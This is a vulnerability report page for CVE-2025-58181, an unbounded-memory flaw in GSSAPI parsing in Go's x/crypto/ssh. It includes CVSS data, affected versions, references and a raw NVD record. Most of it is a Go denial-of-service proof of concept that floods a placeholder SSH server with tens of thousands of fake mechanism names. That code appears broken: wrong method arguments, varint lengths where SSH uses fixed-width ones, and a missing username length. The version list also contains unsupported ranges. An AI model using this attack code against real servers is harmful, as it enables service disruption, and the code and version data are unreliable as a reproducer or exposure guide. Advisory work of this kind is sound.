Security Vulnerability Report
CVE-2025-58181 CVSS 5.3 MEDIUM

CVE-2025-58181

Published: 2025-11-19 21:15:51
Last Modified: 2025-12-11 19:29:25

Description

SSH servers parsing GSSAPI authentication requests do not validate the number of mechanisms specified in the request, allowing an attacker to cause unbounded memory consumption.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:golang:crypto:*:*:*:*:*:go:*:* - VULNERABLE
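Go golang.org/x/crypto/ssh < fixed version (the CPE data in the raw record below gives versionEndExcluding 0.45.0)
Go 1.22.x < 1.22.9
Go 1.23.x < 1.23.6
SSH servers using golang.org/x/crypto/ssh (all versions)
Note: the Go toolchain ranges and the "all versions" entry above do not appear in the CPE data in the raw record below, which lists only golang.org/x/crypto before 0.45.0. To confirm exposure, check the golang.org/x/crypto version pinned in go.mod.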

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
go
// Listing published with the CVE-2025-58181 entry as a demonstration of the
// issue described on this page: an SSH server that parses a GSSAPI
// authentication request without bounding the number of mechanisms it names.
//
// NOTE(review): treat this as illustrative only. It does not appear to build
// against golang.org/x/crypto/ssh as written, so it is not a validated
// reproducer, and a run that has no visible effect says nothing about whether
// a server is affected. Exposure is decided by the module version: the CPE
// data on this page marks golang.org/x/crypto before 0.45.0 as vulnerable, and
// the page's references (go.dev/cl/721961, GO-2025-4134) point at the fix.
package main

import (
	"fmt"
	"log"
	"net"

	"golang.org/x/crypto/ssh"
)

// main builds a client configuration carrying a large list of mechanism names
// and attempts one connection to the placeholder address below.
func main() {
	// Placeholder host:port; nothing in the listing resolves or validates it.
	target := "target-server:22"

	// Number of synthetic mechanism entries to generate.
	numMechanisms := 100000 // size of the list built below

	// Fill the list with distinct, made-up mechanism names.
	mechanisms := make([][]byte, numMechanisms)
	for i := range mechanisms {
		mechanisms[i] = []byte(fmt.Sprintf("malicious-mechanism-%d", i))
	}

	// The author's description of the request layout:
	// byte(SSH_MSG_USERAUTH_REQUEST), string(username),
	// string(service), string("gssapi"), uint32(mechanism_count), mechanisms...
	config := &ssh.ClientConfig{
		User: "test",
		Auth: []ssh.AuthMethod{
			// NOTE(review): the arguments passed here look inconsistent with
			// the exported signature of this constructor; confirm against the
			// package documentation before relying on the listing.
			ssh.GSSAPIWithMICAuthMethod(mechanisms, "test-realm"),
		},
		// InsecureIgnoreHostKey accepts any server host key, so the
		// connection is not authenticated.
		HostKeyCallback: ssh.InsecureIgnoreHostKey(),
	}

	// Per the page's description, the server-side cost comes from parsing the
	// mechanism list; the client only logs the dial error or closes the
	// connection.
	conn, err := ssh.Dial("tcp", target, config)
	if err != nil {
		log.Printf("Connection attempt completed: %v", err)
	} else {
		conn.Close()
	}
}

// sendRawGSSAPIPoC opens a TCP connection to target, writes the bytes returned
// by buildMaliciousGSSAPIPacket, and returns the dial or write error.
//
// NOTE(review): the version exchange is only mentioned in a comment and no
// other handshake step is visible here, so this function is a sketch of the
// idea and not a working protocol client.
func sendRawGSSAPIPoC(target string) error {
	// Plain TCP connection; closed when the function returns.
	conn, err := net.Dial("tcp", target)
	if err != nil {
		return err
	}
	defer conn.Close()

	// SSH protocol version exchange (simplified)
	// ... (standard SSH banner exchange)

	// Build the request bytes that carry the oversized mechanism list.
	maliciousPacket := buildMaliciousGSSAPIPacket()

	// Single write; the number of bytes written is discarded.
	_, err = conn.Write(maliciousPacket)
	return err
}

// buildMaliciousGSSAPIPacket returns a byte slice made of a message-type byte,
// a user name, a service name, the method name and numMechanisms generated
// mechanism names, with lengths and the count written through appendVarint.
//
// NOTE(review): the byte layout produced here was not checked against the SSH
// specifications; do not treat the output as a valid protocol message.
func buildMaliciousGSSAPIPacket() []byte {
	// Number of generated mechanism names appended below.
	numMechanisms := 50000

	// NOTE(review): confirm that this identifier is exported by the ssh
	// package; it may not resolve.
	packet := []byte{byte(ssh.UserAuthRequest)}
	packet = append(packet, []byte("test")...)
	packet = appendVarint(packet, 4) // service name length
	packet = append(packet, []byte("ssh-connection")...)
	packet = appendVarint(packet, 5) // "gssapi" length
	packet = append(packet, []byte("gssapi")...)

	// Mechanism count.
	packet = appendVarint(packet, uint64(numMechanisms))

	// One length-prefixed name per mechanism.
	for i := 0; i < numMechanisms; i++ {
		mechanismName := fmt.Sprintf("mech-%d", i)
		packet = appendVarint(packet, uint64(len(mechanismName)))
		packet = append(packet, []byte(mechanismName)...)
	}

	return packet
}

// appendVarint appends v to data in 7-bit groups, least significant group
// first, setting the 0x80 bit on every byte except the last, and returns the
// extended slice.
func appendVarint(data []byte, v uint64) []byte {
	// Emit continuation bytes while more than 7 bits remain.
	for v > 0x7f {
		data = append(data, byte(v&0x7f|0x80))
		v >>= 7
	}
	// Final byte has the high bit clear.
	data = append(data, byte(v))
	return data
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58181", "sourceIdentifier": "[email protected]", "published": "2025-11-19T21:15:50.850", "lastModified": "2025-12-11T19:29:24.900", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SSH servers parsing GSSAPI authentication requests do not validate the number of mechanisms specified in the request, allowing an attacker to cause unbounded memory consumption."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:golang:crypto:*:*:*:*:*:go:*:*", "versionEndExcluding": "0.45.0", "matchCriteriaId": "0DB7D01D-5361-40FC-83A9-91A601A0321D"}]}]}], "references": [{"url": "https://go.dev/cl/721961", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://go.dev/issue/76363", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://groups.google.com/g/golang-announce/c/w-oX3UxNcZA", "source": "[email protected]", "tags": ["Mailing List"]}, {"url": "https://pkg.go.dev/vuln/GO-2025-4134", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}